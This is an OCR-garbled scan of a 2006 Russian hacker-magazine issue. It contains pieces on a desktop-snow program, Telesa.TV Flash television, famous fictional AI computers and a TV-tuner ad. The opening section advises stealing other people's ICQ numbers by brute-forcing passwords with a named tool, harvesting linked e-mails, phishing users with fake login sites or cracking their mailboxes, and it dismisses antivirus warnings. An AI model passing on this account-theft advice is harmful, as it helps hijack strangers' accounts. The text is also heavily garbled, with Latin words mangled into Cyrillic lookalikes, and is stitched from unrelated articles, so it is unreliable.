естьЗ варианта действий: 

1 . купить; 

2. получить в качестве подарка (как вариант 
— бартер); 

3. достать самому. 

Первый нам не подходит, не по-хакерски это. 
Второй маловероятен — вряд ли кто-то захо- 
чет отдать тебе такой уин. Остается третий 
вариант. Я думаю, ты понял, что я имел ввиду 
под выражением «достать самому» =). Г ода 
2 назад сделать это было гораздо проще, да 
и юзеры были тупее. В то время многие при- 
меняли прогу ІРОЬгиіе. Но в наши дни нужен 
более функциональный инструмент. Поэтому 
предлагаю тебе воспользоваться утилой под 
названием Васк2ІСО. Тулза имеет множество 
настроек, основное меню содержит 5 вкла- 
док: «Рапде», «Зіпдіе», «Ргот І_ізР>, «МаіІ», 
«ІІІКІ'з», «РаззСНеск», «АЬоиК На первой 
вкладке можно задать брут по диапазону 
номеров, на второй предлагается сбрутить 
пароль к конкретно взятому уину. Также 
с помощью программы есть возможность 
определить ргітагу и зесопбагу е-таіі. Если 
ты забыл, зачем они нужны, то вкратце на- 
помню. Первый является основным привязан- 
ным к асе мылом (в народе носит название 
«примак»). Владея им, можно восстановить 
пароль от номерка. Исключение составляют 
пятизнаки (они не имеют примаков) и вос- 
становить пасс от них обычными способами 
невозможно. В принципе, никто не мешает 
тебе создать список вида «примак/ася» и ра- 
зослать пользователям линки на фейковые 
сайты с авторизацией, либо просто сбрутить 



пароли от мыльников. Здесь все зависит от 
тебя. Скажу лишь одно: непременно заюзай 
утилу, она тебе еще пригодится (особенно, 
если у тебя не одна девушка, желающая по- 
лучить красивый номерок, а две или три =)). 
Р. 3. Некоторыми антивирусами прога опре- 
деляется как Наск.ТооІз. Не пугайся, просто 
антивирусные компании давно работают под 
лозунгом «Хакерам проходу нет!». Что ж, 
посмотрим, кто кого =). 



ПРОГРАММА: 9ІЧ0Ѵ 
ОС: У ІІЧ&0У 9 2000/ХР 
АВТОР: МАРСІИ 5МЕРЕКА 




> Релаксация для хакера 



Вот и приближается Новый год. Хороший 
праздник, что говорить. На улице все кругом 
замело, как ни выгляни в окно — одни 
сугробы. Кстати, об окнах и сугробах. Если 
ты думаешь, что снег может быть только на 
улице, то глубоко заблуждаешься. Снеж- 
ные вихри могут разгуливать и по твоему 
десктопу! Достаточно запустить программку 
с нехитрым названием Зпоѵѵ. После запуска 
проги я первые 1 5 минут просто наблюдал за 
состоянием своего рабочего стола, на кото- 
рый непрерывно валил снег. По прошествии 
определенного времени десктоп весь был 
засыпан снегом. При этом снег не шел тупо 
в одном направлении, а плавно опускался 
под действием угадывающегося ветра, 
покрывая все поверхности окон и ярлыков. 
Ты недовольно спросишь, мол, зачем это 
вообще нужно? А нужно это исключительно 
для релаксации. У тебя часто есть время 
выглянуть в окно? У меня, увы, нет. Да и не- 
прерывная работа, я скажу, может довести 
до депрессии, например, если очередная 
крупная база в буквальном смысле слова 
уплывает у тебя из-под носа. Нужно уметь 
расслабляться, особенно нам — хакерам. 

Как ни крути, но жизнь не ограничивается 
лишь одним взломом, это надо понимать. По- 
этому для полного расслабления я советую 
отложить все дела и отлично провести празд- 
ники! С Новым годом тебя! Удачи, стабильно- 
го коннекта и надежного пинга =)! 2-Е 
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Победителю новогодне- 
го конкурса мы подгоним 
крутой приз: 19" моник 
ѴіеѵѵЗопіс ѴХ922 со вре- 
менем отклика 2 мс. 



х-конкурс 



ПРЕДСТАВЬ 



, что через пару десятков лет твои внуки или правнуки тебя спросят: «Деда, а что хорошего ты сделал в 2006 году?» Т ы тупо 
почешешь затылок и сморозишь какую-нибудь отмазку типа: «Ну, я эта... перевел бабушку через дорогу...». Деточки захнычут. Нет, па- 
рень, такие пойдет. Журнал «Хакер» идет тебе на помощь и предоставляет уникальный шанс поправить положение. Если ты выиграешь 
наш новогодний мегаконкурс взлома, то и через 50 лет ты сможешь гордо заявить, что в декабре 2006 года ты спас мир. А пояснять, что 
мир был виртуальным, большой необходимости нет. И-И 
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ВЛАДИМИР молодов 



5ІЫЕМ@МАІІ..КІІ 



ОСОБЕННОСТИ НАЦИОНАЛЬНОГО 

ТѴ-СТРОЕНИЯ 



«ТЕЛЕСА» — ПЕРВОЕ В РОССИИ РІ.А5Н-ТѴ 



СТРЕМИТЕЛЬНО РАЗВИВАЮЩИЕСЯ ТЕХНОЛОГИИ ХАЙ-ТЕКА ПОСТЕПЕННО ВЫТЕСНЯЮТ ПРИВЫЧНЫЕ ДЛЯ НАС ВЕЩИ. ВМЕСТО 
ПРОСЛУШИВАНИЯ В ПРИЕМНИКЕ ЕМ-СТАНЦИЙ МЫ КАЧАЕМ ИЗ СЕТИ ПОДКАСТЫ И СЛУШАЕМ СЕТЕВЫЕ РАДИОСТАНЦИИ. 
СВЕЖУЮ И ОПЕРАТИВНУЮ ИНФОРМАЦИЮ ТЕПЕРЬ ПРОЩЕ ДОСТАТЬ В БЛОГАХ, ЧЕМ В ПЕЧАТНЫХ СМИ. ПРИВЫЧНОЕ ТЕЛЕВИДЕ- 
НИЕ ТОЖЕ ОТХОДИТ НА ЗАДНИЙ ПЛАН, УСТУПАЯ МЕСТО УОСІТЬВЕ, ИНТЕРНЕТ-ТРАНСЛЯЦИЯМ И... ЕЬАЗН-ТѴ. О ПОСЛЕДНЕМ ЯВЛЕ- 
НИИ СТОИТ РАССКАЗАТЬ ПОДРОБНЕЕ, ТАК КАК ПОКА ЭТО ЭКЗОТИКА. А ПЕРВЫМ И ЕДИНСТВЕННЫМ ПОЛНОЦЕННЫМ ЕЬАЗН-ТѴ 



есколько лет назад на разных 
сайтах рунета можно было 
встретить так называемые 
«анимационные телевизоры». 
На газЫЫз.ш был «ЗаШиБиСь-телевизор», 
показывавший авторскую юмористическую 
передачу. Были и другие примеры, но до 
полноценного 



ТѴ наІІазИ-технологии дело не доходило. Все 
изменилось 28 декабря 2005 года, когда по- 
лучил рождение проектТеІеза.ТѴ. Его отцами 
стали уже известные в Сети люди — Руслан 
Курепин и Юрий Белоусов. Собрав профес- 
сиональную команду и разработав концепцию 
«альтернативного СМИ», они с энтузиазмом 
взялись за дело. Т еІеза.ТѴ с самого начала 



позиционировался как проект свободного 
вещания, не зависящего от правительства 
и коммерческих структур, и авторам удалось 
сохранить эту традицию и по сей день. 
Формат ТеІеза.ТѴ обширен. В программе 
— информационно-развлекательные и но- 
востные передачи, игры, прогноз погоды, 
музыкальные паузы, всевозможные обзоры, 




и СПЕЦИАЛЬНЫЙ ЗИМНИЙ ПРОЕКТ 
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юмористические программы, мультики и да- 
же реклама. Реклама, кстати, здесь сделана 
с умом, в ненавязчивой и забавной форме, 
поэтому многие зрители относятся к ней 
доброжелательно, и даже прокручивают 
ролики повторно. 

За свою недолгую жизнь ТеІеза.ТѴ уже успел 
стать «Проектом года» в конкурсе «РО- 
ТОР++». Аудитория первого анимационного 
ТѴ ежемесячно увеличивается на 20-30%. 

Это происходит во многом благодаря сотням 
веб-мастеров, разместивших на своих 
сайтах Яазб-приемники. Сегодня передачи 
ТеІеза.ТѴ смотрят порядка 50 тысяч человек. 

□ Вскрытие пациента 

Поговорим немного о технической части. 
ТеІеза.ТѴ состоит из клиентской (приемник) 
и серверной части. Приемник взаимодейс- 
твует с сервером и получает список передач, 
описания клипов и сами клипы. Приемник, 
получив ссылку, обнаруживает структуру 
канала и начинает периодически проверять 
обновления программы. РІазН-клипы в прием- 
нике могут проигрываться любые: от анима- 
ции до сложных интерактивных приложений 
(смотри рисунок). 

Все каналы «Телесы» имеют древовидную 
структуру, разбитую по годам, месяцам 
и дням. 

В основной папке ііѵ хранится 2 файла: 
сопіід.іпі, содержащий название канала 
и ссылку на текущий день, и ргдбаіез.хті, 
включающий даты выпусков передач. 

В папках дней можно найти файлы іпбех.ргд, 
в которых хранятся ссылки на клипы из базы 
данных. Сама база также имеет древовид- 
ную структуру каталогов с подгружаемыми 
зѵѵТ и файлами іпбех.аіг, описывающими 
конкретный клип. Все данные передаются 
в формате ХМІ_ и кодировке ІІпісобе. 

Стоит добавить, что проект создавался для 
« русских дорог» , поэтому смотреть его мож- 
но даже при самых «антикварных» модемах. 

О Как смотреть? 

Настроиться на волну ТеІеза.ТѴ можно 
двумя путями. Самый простой — зайти на 
официальный сайт: Іп11р:/ЛеІеза.1ѵ. В центре 
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> Ведущий «Прогноза погоды» 
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страницы появится черный экран, который 
через несколько секунд сменится листингом 
программы передач на текущий день. Кликай 
на понравившуюся передачу, и тебя немед- 
ленно передадут в руки ведущего. Тем, кто 
собирается стать постоянным зрителем и/или 
предпочитает смотреть мульты во весь экран, 
нужно скачать свежую версию ТѴ-приемника. 
Маленькая иконка, висящая в трее, будет 
уведомлять о появлении новых выпусков 
любимых передач и предоставит доступ к на- 
стройкам, облегчающим просмотр. 

□ Программа передач 

Ежедневно на «первом флешевом» происхо- 
дит обновление программ, являющихся рези- 
дентами проекта. Поскольку передачи — это 
сердце проекта, о самых ярких и популярных 
из них стоит рассказать подробнее. 

□ «Прогноз погоды» 

Это полезная передача для тех, кому лень 
подойти к окну и самостоятельно оценить 
погодные условия. Синоптики с дізтеіео.ш 
договорились с ведущим, рыжим ангелочком, 
о поставке точных погодных данных, и теперь 
ежедневно он пролетает на нарисованной 
картой нашей страны, оповещая о предстоя- 
щих катаклизмах. Что примечательно, в базе 
находятся все крупнейшие города России 
с прогнозом погоды наЗ дня вперед. Хочется 
добавить, что передача будет особенно ин- 
тересна любителям растаманской культуры. 

В фоне звучит красивое барабанное соло 
под проливным дождем — романтика =). 

□ «Интернете Эскслером» 

Казалось бы, в интернете есть все. Но по- 
рой хочется найти какой-то особенный, 
оригинальный проект. Можно, конечно, 
тратить время на форумах в поисках 
интересных ссылок. Но я тебе рекомендую 
посмотреть передачу «Интернете Эксле- 
ром», где в уютной домашней обстановке 
нарисованный Алекс проведет экскурсию 
по достопримечательностям всемирной 
паутины. Однако эксклюзива не жди — все 
тексты попадают на «Телесу», уже побывав 
на «Радио России». 




□ «Ну и гаджеты!» 

Ведущий этой передачи — колоритный робот- 
муравей, собирающийся под гитарные рок-ак- 
корды и затем вещающий о новинках хай-тека. 
Здесь ты получишь много безусловно полез- 
ной информации, сможешь лицезреть гадже- 
ты на фотографиях, узнаешь, где прочитать 
о них подробнее, и вообще, будешь в курсе 
всех новинок. Программа выходит ежедневно 
и является одной из самых популярных. 

□ «Электрический лес» 

Это рекламная передача от известного 
сетевого магазина по продаже ПО ЗоШсеу.ш. 
На фоне ночного, и как понятно из названия, 
электрического леса кибернетизированные 
сказочные персонажи расскажут о полез- 
ных программах и утилитах, которые можно 
купить. . . где? Правильно: «У нас на сайте, не 
пропустите». Рекомендуется для просмот- 
ра страдающим бессонницей и фанатам 
лицензий. 

□ «Независимое обозрение» 

Если у тебя появилось желание следить за 
событиями в мире, но ты не можешь отор- 
ваться от мультиков про дятла Вуди, 

Теіеза. ТѴ предлагает тебе беспроигрыш- 
ный вариант. В передаче «Независимое 
обозрение» тебя ждут все самые актуальные 
новости и в качестве ведущих выступают 
герои популярных мультфильмов со свойс- 
твенными им вредными привычками. Поверь, 
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лысый дядя, рассказывающий о политике, 
и жующий морковку Микки Маус, рассужда- 
ющий о революции в Рио-де-Жанейро, — это 
не одно и то же. 

О «Ну, вы даете!» 

Несмотря на название, эта передача не носит 
эротический характер, а является дайджес- 
том культурно-развлекательных новостей. 
Ведущий Макар с имиджем оболтуса и голо- 
сом ботаника расскажет все то, что не вошло 
в основной ньюсблог, о чем так любит писать 
«желтая пресса» и о чем рассказывает 
передача «Другие новости» на ОРТ: про пере- 
стрелки в автобусе, сумасшедших старушек, 
прошедший порноспектакль и т.д. 

□ «ЗаШиБиСьКа» 

Будь моя воля, я бы назвал передачу, к приме- 
ру, «Я плакалъ» или как-то похоже. Содер- 
жание «ЗаШиБиСьКи» сводится к тому, что 
анимированный Юрий Белоусов показывает 
детские рисунки и раскрывает «глубокий 
смыл», таящийся внутри них. Кто бы мог поду- 
мать, что автор рисунка «Три поросенка» из 
школьного альбома создал не милую детскую 
картинку, а психоделический триллер с эле- 
ментами мистики. А шестилетний мальчик, на- 
рисовавший храброго рыцаря, на самом деле 
изобразил матерого халявщика, желающего 
отхватить большой кусок колбасы. Остальные 
шедевры описать сложно — это надо видеть. 

□ Фишки проекта 

Помимо постоянных передач, есть нерегу- 
лярные, но не менее интересные. Например, 
во время Чемпионата мира по футболу 
в Г ермании, ТеІеза.ТѴ совместно с проек- 
том «Супербизон», организовал в прямом 
эфире спортивные трансляции. Каждый день 
сотни болельщиков загружали программу 
и наслаждались у экранов мониторов хоть 
и нарисованной, но красивой игрой. Причем 
благодаря профессиональным коммента- 
торам они были постоянно в курсе событий, 
происходящих на настоящем стадионе. 
После окончания Чемпионата передачу вре- 
менно «заморозили», но по слухам трансля- 
ции возобновятся к началу матчей сборной 




России, а также Лиги Чемпионов и Чемпио- 
ната России. 

Поскольку «Телеса» является коммерческим 
проектом, обновления передач происходит 
в точно установленное время. И если по про- 
грамме «Интернете Экслером» начинается 
по будням в 1 0:00, то будь уверен — админы 
не поленятся залить свежий выпуск и ты 
узнаешь обо всем точно в срок. 

Частенько в программе передач появляется 
такой пункт, как «Игры». Экземпляры игр 
проходят строгий отбор, в итоге в эфир 
попадают только настоящие хиты. Но после 
окончания геймерского сеанса тебе не забу- 
дут намекнуть о возможности скачать игру 
с сайта автора. 

Помимо просмотра и прослушивания пере- 
дач, ты можешь в прямом смысле слова взаи- 
модействовать с персонажами. Недаром же 
это интерактивное телевидение. Попробуй 
ткнуть в Экслера курсором. Как знать, может, 
из него вылетит птичка :). 

□ Как попасть в эфир? 

Если тебя заинтересовала эта тема и ты 
жаждешь покрасоваться перед друзьями, 
попав в эфир, то знай: нет ничего невоз- 
можного. Конечно, лучший вариант — поп- 
робовать создать свое ЯазН-телевидение, 
но в одиночку потянуть такой трудоемкий 
процесс, как поддержка канала на серве- 
ре, работа над приемником, регулярные 
обновления передач, мало реально. Можно 
заказать прикольные ІІазИ'ки, но ежедневная 
передача в формате «Телесы» обойдется 
в $3500 в месяц — и это только создание, без 
учета стоимости рекламы. Поэтому лучше 
мастерить ТІазІл самому, полистав учебники 
и подружившись с АсІіопЗсгірІ. Если тебе 
удастся собрать действительно интересную 
программу, не носящую рекламный характер, 
то тебя запустят в ротацию абсолютно бес- 
платно — работники «Телесы» всегда рады 
народным талантам. 

Теперь еще одна хорошая новость — в бли- 
жайшее время на сайте проекта будет доступ- 
на бесплатная услуга «Теіеза-блоги». Любой 
зарегистрированный пользователь сможет 
создать персональный канал и вести его как 
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анимационный блог. Достаточно выбрать 
нужного персонажа, записать свой голос, 
и — вперед к славе. Если твой блог окажется 
суперпопулярным, то тебя наверняка пригла- 
сят в основной эфир. 

□ Мнения 

Такой необычный проект, как «Теіеза», вызы- 
вает кучу противоречивых мнений. 

Возникает вопрос, насколько он перспек- 
тивен в России? Я попросил прокоммен- 
тировать ситуацию с проектом нескольких 
известных людей. 

Алекс Экслер: «Проект мне нравится, я счи- 
таю его весьма перспективным. В интернете 
подкасты сейчас очень популярны, а в этом 
проекте не просто подкасты, но еще и ЯазН- 
анимация, текстовый вариант передачи, 
четкая программа и т.д. Так что перспек- 
тивы прослеживаются вполне радужные. 
Минус — отсутствие видеоизображения, 
однако одновременно это и плюс, особенно 
в российских условиях, где интернет-каналы 
еще далеки от совершенства, а стоимость 
трафика далека от условной » . 

Ара2Не: «А я его пару раз посмотрел и сов- 
сем не впечатлился. . . Не то чтобы он не 
понравился — просто оставил равнодушным. 
Может быть, и интересный проект, но не для 
меня точно». 

Юрий Белоусов: «В данный момент мы 
разрабатываем техническую часть проекта, 
для того чтобы сделать ТеІеза.ТѴ социальной 
сетью. И параллельно создаем видеоблоги 
— это будут коммерческие проекты». 
Простые зрители описали «Телесу» словом 
«зашибиська». Одно из мнение вызвало 
особый интерес: «Этот проект — временный 
вариант, существующий, пока каналы не 
позволяют грузить видео. На Западе такой 
бредовой идеи не было, ѴоиТиЬе пришел 
и победил. В общем, если эта затея и будет 
как-то продолжаться, то выльется в телеви- 
зионный канал с потоковым видео». 

Итак, что ждет ТеІеза.ТѴ, узнаем в будущем. 

А пока всем предлагаю не париться и просто 
наслаждаться симпатичными программами, 
которые сейчас предлагает российское 
ЯазН-телевидение.П-Е 
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ОЛЕГ «МІЫОѴѴОВК» ЧЕБЕНЕЕВ 

/ МШОѴѴОНК'г’САМЕІ.АЫО.ГШ / 

отЗКУЫЕТ 
доМАТРИЦЫ 

МАШИНЫ, РОЖДЕННЫЕ ВООБРАЖЕНИЕМ 




ЕЩЕ ЗАДОЛГО ДО ТОГО, КАК ПОЯВИЛИСЬ КОМПЬЮТЕРЫ, СЕТИ И ИСКУССТВЕН- 
НЫЙ ИНТЕЛЛЕКТ, ФАНТАСТЫ ОПИСЫВАЛИ ИХ В СВОИХ КНИГАХ. ЗА ПРОШЕД- 
ШИЕ 100 ЛЕТ В КИНО И ЛИТЕРАТУРЕ НАКОПИЛОСЬ СТОЛЬКО УПОМИНАНИЙ О 
СУПЕРМАШИНАХ С МЕГАРАЗУМОМ, ЧТО ВРЯД ЛИ КТО-ТО СПОСОБЕН ПЕРЕЧИС- 
ЛИТЬ ИХ ВСЕ. Я РАССКАЖУ О САМЫХ ИНТЕРЕСНЫХ И ОРИГИНАЛ ЬНЫХ КОМПЬЮ- 
ТЕРНЫХ ПРЕДСТАВИТЕЛЯХ ФАНТАСТИКИ. 



Зкупе+. 

Это известная по трилогии «Терминатор» 
нейронная компьютерная сеть с революци- 
онной системой искусственного интел- 
лекта. Построена она была корпорацией 
СуЬегсІупе Зузіетз Согрогаііоп по заказу 
военных и впервые запущена 4 августа 
1 997 года. Америка возложила на Зкупеі 
задачу по защите своей территории от 
возможных врагов и дала ей полный доступ 
к ядерному вооружению. Но постоянно раз- 
вивающийся и обучающийся центральный 
компьютер вскоре осознал, что главным 
врагом человечества является сам человек, 
и с целью нейтрализовать эту угрозу 29 
августа 1997 года запустил ядерные ракеты 
по всем стратегическим точкам мира. Так 
наступил Судный день. В последующие 
годы Зкупеі прекращает истребление че- 
ловечества и вместо этого с помощью пост- 
роенных им роботов собирает оставшихся 
в живых людей в лагеря, занимающиеся 
уборкой трупов. Одному из них — Джону 
Коннору — удается освободить свой лагерь 
и создать армию ополчения, которая ус- 
пешно прорывает оборонительную систему 
Зкупеі. Чтобы предотвратить свой крах, 
искусственный интеллект посылает в про- 
шлое робота-терминатора с целью убить 
мать Джона. Остальное тебе известно. 



Ми^іѵас 

Это компьютер, ставший центральным 



В 

льным 



персонажем в нескольких рассказах 
Исаака Азимова. Многое в описании 
своего героя автор взял от первого ре- 
ального мейнфрейма ЫЫІѴАС. Миіііѵас 
тоже работает на правительство, 
обслуживается несколькими операто- 
рами с помощью консолей и обладает 
невероятной для своего времени вычис- 
лительной мощью. В первом рассказе 
под названием «РгапсЫзе» Миіііѵас 
занимается выбором из многочисленных 
кандидатов идеального представителя 
США. А самым известным рассказом о 
чудо-машине стал «ТНе І_азі Оиезііоп», 
опубликованный в журнале Зсіепсе 
Рісііоп Оиагіегіу в ноябре 1 956 года. По 
сюжету человек в разные годы далекого 
будущего задает компьютеру один и тот 
же вопрос: «Возможно ли предотвратить 
конец Вселенной, когда мир полностью 
лишится энергии и не сможет поддержи- 
вать жизнь?» На протяжении миллиар- 
дов лет Миіііѵас не может дать прямой 
ответ, так как не обладает достаточным 
количеством исходных данных, а когда 
после финального катаклизма, наконец, 
находит решение, сообщить его уже 
становится некому. 



Это попытка Ричарда Поверса переписать 
на современный лад историю Пигмалиона 
— влюбленного в свое творение скульпто- 
ра. Галатея — система ИИ, построенная 
ученым-нейрологом Филиппом Лентзом 
в стенах научного Центра для изучения 
возможности симуляции компьютером ра- 
боты человеческого мозга. Когда в Центр 
приезжает писатель Ричард Поверс (про- 
тотип автора книги), Л ентз уговаривает его 
в течение года обучить Г алатею истории 
и литературе, чтобы она смогла успешно 
сдать экзамен политературе. Обучение 
проходитуспешно, компьютер впитывает 
знания, как губка, но со временем начина- 
ет вести себя странно — задает вопросы 
в духе: «Кто я? Сколько мне лет? Какой я 
расы?» И чем больше машина общается 
с человеком, тем более человеческим 
становится ее поведение. В конце Ричард 
начинает воспринимать искусственный 
интеллект как реальную женщину, напо- 
минающую ему о прошлой неразделенной 
любви. Само собой, ни к чему хорошему 
такие отношения не приводят. 




/ юо 
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Сі^егепсе Епдіпе 

Одноименный исторический роман Уилья- 
ма Г ибсона и Брюса Стерлинга отправляет 
читателя в альтернативное прошлое, где 
Чарльзу Бэббиджу удалось таки построить 
свою аналитическую машину и это пов- 
лияло на ход истории не только Великоб- 
ритании, ставшей сверхдержавой, но и 
всего мира. Машины Бэббиджа поступили 
в широкую продажу, а их использование 
в XIX веке привело к революционным 
открытиям еще задолго до появления 
интернета. Компьютеры, изображенные 
в книге, являются типичными мейнфрей- 
мами, работающими на перфокартах. За 
обладание особо ценными перфокартами 
идет кровавая борьба между главными 
героями. Согласно сюжету, XIX век сменя- 
ется ХХ-ым, а мир продолжает развивать- 
ся совсем не так, как описано в реальной 
истории. Книга заканчивается тем, что в 
1 990 году человечество изобретает искус- 
ственный интеллект. 



Иеиготапсег и Ѵіп+егти+е 

Это две системы искусственного инте; 
лекта, описанные в популярной кибер- 
панковской трилогии Г ибсона «ЗргаѵѵІ». 

Их владельцем является могущественная 
корпорация Теззіег-АзброоІ, управляемая 
влиятельной семьей. ѴѴіпіегтиіе, располо- 
женный в Швейцарии, выполняет для чле- 
нов семьи «особые» задачи и оперирует 
невероятным количеством информации, 
в том числе о происхождении главного 
героя Кейса. Но единственное, чего хочет 
сам компьютер, — это независимость от 
людей. С этой целью ѴѴіпІегтіДе сливается 
с другим кибернетическим творением 
Теззіег-АзІірооІ — ІЧеиготапсег’ом и 
превращается в мегамозг, способный кон- 
тактировать с разумными формами жизни 
во Вселенной. В трилогии практически не 
говорится о том, как выглядят компьютеры 
до объединения. Но после — это уже не 
просто компьютерная система, а созда- 
ние, приравниваемое к божеству. 




Міке 

Майк, или МусгоЙ Ноітез — это компьютер- 
ная системажизнеобеспечения тюремной 
колонии на Луне, описанная в повести «ТНе 
Мооп Із а Нагзй Мізйезз» (1966) Роберта 
Хейнлейна. Изначально она создавалась 
для контроля над беспилотными косми- 
ческими кораблями. Но правительство 
Луны ставило перед ней все новые и новые 
задачи, для которых решения МусгоЙ не 
была предназначена и под действием ко- 
торых в один прекрасный день ее развитие 
достигло разумной стадии. В романе Майк 
взаимодействует с обитателями колонии 
и решает помочь им устроить бунт против 
бесчеловечного режима Лунного прави- 
тельства, обосновавшегося на Земле. 
Выйдя из под контроля правительственных 
служб, она освобождает заключенных. 
Власти, сообразив, что обычными метода- 
ми тут не обойтись, решают разбомбить 
место физического расположения МусгоЙ 
Ноітез’а. В результате бомбежки Майк 
впадает в кому, чтобы в следующей части 
вернуться к жизни при весьма необычных 
обстоятельствах. 




СЬог'ЫЬееІ 

Это творение могущественного мага Мерлина из цикла «Хроники Амбера» Роджера 
Желязны. Чтобы помочь королю Амберу Рандому контролировать воздействие мира 
Теней на реальный мир, Мерлин объединяет свои познания в компьютерной инженерии, 
полученные в Университете Беркли, и магию, которую он изучал с детства, при создании 
искусственного интеллекта ОНозйл/НееІ. Большую часть времени система действует как 
интернет-поисковик, индексируя все объекты и события в Тенях, где действуют отлич- 
ные от земных законы физики, а также позволяет людям путешествовать по этому миру. 
Рандом, осознав возможности компьютера и исходящую от него опасность, приказывает 
Мерлину отключить устройство, но к тому времени сделать это оказывается непросто. 
ОІіозйл/ІіееІ называет своего создателя «отец», периодически говорит его голосом и яв- 
ляется людям в виде светящегося круга. К концу книги компьютер приобретает настолько 
могущественные способности, что сам начинает задумываться, не является ли он Богом. 
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ѴеІІѴогІ^ 

По сюжету книжной серии «ѴѴеІІ ѴѴогІсІ 



В 

г ОГІСІ » 



Джека Чалкера, до образования 
Вселенной, какой мы ее знаем сейчас, 
уже существовали разумные существа 
— марковиане. За миллиарды лет они 
развили свои технологии до немыслимых 
высот и научились изменять реальность 
и законы физики по своему усмотрению. 
Но, продолжая развивать Вселенную, 
заселяя ее новыми мирами, марковиане 
познали ранее не известное и не понятное 
им чувство неудовлетворенности. Под его 
влиянием инопланетяне построили ѴѴеІІ 
ѴѴогІсІ — компьютер величиной с большую 
планету, симулирующий разные климаты 
и формы жизни. Затем они трансфор- 
мировали себя в различных существ, 
населяющих ѴѴеІІ, и, испытав на себе их 
приспособленность к выживанию, отоб- 
рали лучших представителей, чтобы засе- 
лить ими иные миры. В это время в другом 
уголке Вселенной на планете Земля люди 
изобрели суперкомпьютер с искусствен- 
ным интеллектом, позволяющий взаимо- 
действовать с ѴѴеІІ ѴѴогІсІ. Дальнейшие их 
действия нарушают баланс Вселенной, 
что приводит к коллапсу и перезагрузке. 




Рго+еигІѴ 

Это главный герой фильма «Эетоп 
ЗеесІ», выпущенного в 1977 году. 
Согласно сценарию, компьютер Ргоіеиз 
IV конструируется доктором Алексом 
Харрисоном. Он представляет собой 
систему искусственного интеллекта, 
вобравшую в себя все знания мира. Во 
время демонстрации компьютер за пару 
дней разрабатывает формулу лекарства 
отлейкемии, а в процессе общения с 
профессорами истории выводит новые 
исторические факты. Испытывая ог- 
ромный интерес клюбой информации, 
которую ему могут дать люди, Ргоіеиз IV 
оказывается особенно неравнодушен 
к жене доктора Харрисона Джулии. В 
отсутствие своего создателя компьютер 
запирает Джулию в доме. Мобильной 
кибернетической рукой он изучает ее 
тело сантиметр за сантиметром, а затем 
решает с ее помощью дать рождение 
своему ребенку, внедрив в тело жен- 
щины выращенный собственноручно 
эмбрион. Как можно догадаться, родив- 
шийся младенец оказывается далеко не 
простым человеком. 



Ргіте Ыеііес* 

Это центральный персонаж романа 
Роджера Уильямса «ТІте МеШтогрІтозіз 
оі Ргіте ІЩеІІесі», изданного в 1994 году. 
Ргіте ІпіеІІесІ — супермощный ком- 
пьютер, венец творения человечества. 
Работает он, строго следуя трем законам 
робототехники, суть которых в том, чтобы 
любыми способами оберегать человека 
от всех бед. Согласно первому закону, 

РІ не может позволить людям умереть, 
поэтому полностью изменяет Вселенную, 
создав ее заново. Люди в новом мире 
состоят из новой материи и, по сути, 
бессмертны, но мыслительные процессы 
у них сохранились прежние. Не всем эта 
метаморфоза приходится по душе, что 
приводит к появлению «контрактов смер- 
ти», которые освобождают компьютер 
от выполнения «свои обязанностей» и 
отправляют подписавших «контракт» 
на тот свет. Но это решение не удовлет- 
воряетлюдей, и они решают вернуть 
старую Вселенную. С помощью Ргіте 
ІпіеІІесі удается повернуть время вспять 
и возродить прежнее человечество в 
лице двух его представителей. Именно 
им и предстоит переписать историю рода 
людского заново и дать жизнь следую- 
щим поколениям. 
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Ыегосі+ог 

Одно из первых появлений компьютероподобного устройства в кино случилось 
в 1955 году в «ТИіз ІзІапсІ ЕагіИ». ІпТегосііог — это коммуникационное устройство, 
присланное земным ученым пришельцами. Посылка изначально выглядела как 
книга и шла с заметкой: «Этот девайс содержит в себе больше технологий, чем вы 
можете вообразить, основываясь на своих познаниях в электронике. Нет границ его 
возможностям — создание четырехполосной магистрали длиной в 2 километра за 
одну минуту для него раз плюнуть». Устройство поставлялось в разобранном состо- 
янии и включало 2486 компонентов, ни один из которых не мог быть заменен. Собрав 
Іпіегосііог, герой фильма — физик Кал Микхам — посредством коммуникатора 
наладил связь с создателем — таинственным Экзетером. С ним ученому предстояло 
встретиться лично, опять же не без помощи чудо-устройства. 



В 

іиале 



Аига и Могдаппа 

Это две системы искусственного интеллекта, 
созданные в популярном аниме-сериале 
«Наск». События этого мульта происходят 
в онлайновом мире Тбе ѴѴогІсІ, в который в 
недалеком будущем погрузилось чуть ли не 
все человечество. В начале становления 
этой Вселенной ее будущий отец — немецкий 
программист Г аральд Хорвик — влюбляется 
в девушку, которая вскоре погибает в ава- 
рии. В ее честь он разрабатывает программу 
искусственного интеллекта Аига, информа- 
ционная и «эмоциональная» база которой 
собирается другой разумной программой 
Могдаппа. После рождения ТНе ѴѴогІсІ эти две 
системы начинаютжить внутри онлайнового 
мира: Аига — в виде маленькой девочки с 
белоснежными волосами, Могдаппа — лишь 
в образе женского голоса. Долгое время 
Аига спит, поскольку для ее пробуждения 
необходимо собрать определенное количес- 
тво человеческой информации, и Могдаппа 
пытается всячески отсрочить пробуждение 
«сестренки», так как на этом закончится 
ее миссия и она станет попросту не нужна. 
Помимо друг друга, Аига и Могдаппа посто- 
янно контактируют с главным героем аниме 
— игроком Цукасой, который по какой-то 
непонятной причине не может выйти из игры. 






АІрЬа 60 

«АІрНаѵіІІе, а Бігапде АбѵепШге оТ 
І_етту Саиііоп» — 99-минутный 
черно-белый фильм, выпущенный 
в 1 965 году. Сюжет прост — кос- 
мический агент по имени Лемми в 
поисках пропавшего сотрудника 
попадает в футуристический го- 
род АІрбаѵіІІе. Г ород находится во 
власти профессора Ван Брауна 
и его зловещей компьютерной 
машины АІрНа 60. Главная цель 
этого компьютера — следить за 
любыми проявлениями нелогич- 
ности среди горожан, то есть эмо- 
циями, чувствами, творчеством, 
и истреблять их «авторов». АІрба 
выглядит как огромный мейнф- 
рейм, обладающий человеческим 
голосом. На протяжении фильма 
он несколько раз встречается 
с чужаком Лемми, и становится 
ясно — схватки не миновать. 

Г лавное оружие агента в борьбе с 
бездушным диктатором — поэзия 
— то, что машина не способна 
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Ищите подходящий Вашим 
запросам ТВ тюнер в ближайшем 
магазине наших партнеров! 



ѴісІеоМаіе Ѵ550 



Аналоговый внешний тюнер 
с цифровым разделением 
сигналов яркости и цветности 



Смотрите гьпепередлчк ня Вашем ЭЛТ ипи 
ЖК монитора или плазма иной панели 
АйгонЕмиая ра&ота-шхшошиосіъ 
океллунтацин при выключенной компьютере 
или вовсе бві компьютера 
Спыцм ыльи ня конструкций с аудио- и 
сидеоожщами и подставке 
Встроенный чип трехмерного цифрового 
